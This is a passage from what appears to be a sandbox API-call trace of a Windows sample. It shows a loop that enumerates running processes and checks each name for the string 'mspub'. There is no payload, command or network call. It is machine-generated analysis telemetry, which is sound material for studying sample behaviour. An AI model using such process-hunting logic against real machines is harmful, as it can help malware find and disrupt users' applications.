cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.282] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579140 [0097.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3579140, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.282] StrStrIA (lpFirst="csrss.exe", lpSrch="mspub") returned 0x0 [0097.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.283] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579158 [0097.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3579158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0097.284] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0097.284] StrStrIA (lpFirst="winlogon.exe", lpSrch="mspub") returned 0x0 [0097.284] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.302] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579410 [0097.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3579410, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0097.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0097.302] StrStrIA (lpFirst="services.exe", lpSrch="mspub") returned 0x0 [0097.302] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.303] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579398 [0097.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3579398, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0097.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0097.304] StrStrIA (lpFirst="lsass.exe", lpSrch="mspub") returned 0x0 [0097.304] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.305] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579428 [0097.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579428, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.305] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.305] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.305] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.306] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579350 [0097.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579350, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.306] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mspub") returned 0x0 [0097.306] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.308] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579380 [0097.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.308] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.308] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mspub") returned 0x0 [0097.308] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.309] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579440 [0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579440, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.309] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.309] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.309] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.310] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574cb0 [0097.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574cb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0097.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0097.310] StrStrIA (lpFirst="dwm.exe", lpSrch="mspub") returned 0x0 [0097.310] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.312] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35792f0 [0097.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35792f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.312] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.312] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.313] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579368 [0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.313] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.313] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.314] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579458 [0097.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579458, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.314] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.314] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.316] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579470 [0097.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579470, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.316] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.316] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.318] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579488 [0097.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579488, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.318] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.318] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.319] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35793b0 [0097.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35793b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.319] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.319] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.320] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579578 [0097.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579578, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.321] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.321] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.321] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.322] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579560 [0097.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.322] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.322] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.323] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35793c8 [0097.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35793c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.323] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.323] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.324] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35793e0 [0097.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35793e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.325] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.325] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.326] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35794e8 [0097.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35794e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0097.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0097.326] StrStrIA (lpFirst="spoolsv.exe", lpSrch="mspub") returned 0x0 [0097.326] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.327] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35793f8 [0097.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35793f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.327] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.327] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.328] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35794a0 [0097.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35794a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0097.328] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0097.328] StrStrIA (lpFirst="audiodg.exe", lpSrch="mspub") returned 0x0 [0097.328] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.329] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35794b8 [0097.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x35794b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0097.329] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0097.329] StrStrIA (lpFirst="sihost.exe", lpSrch="mspub") returned 0x0 [0097.329] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.330] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579518 [0097.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, 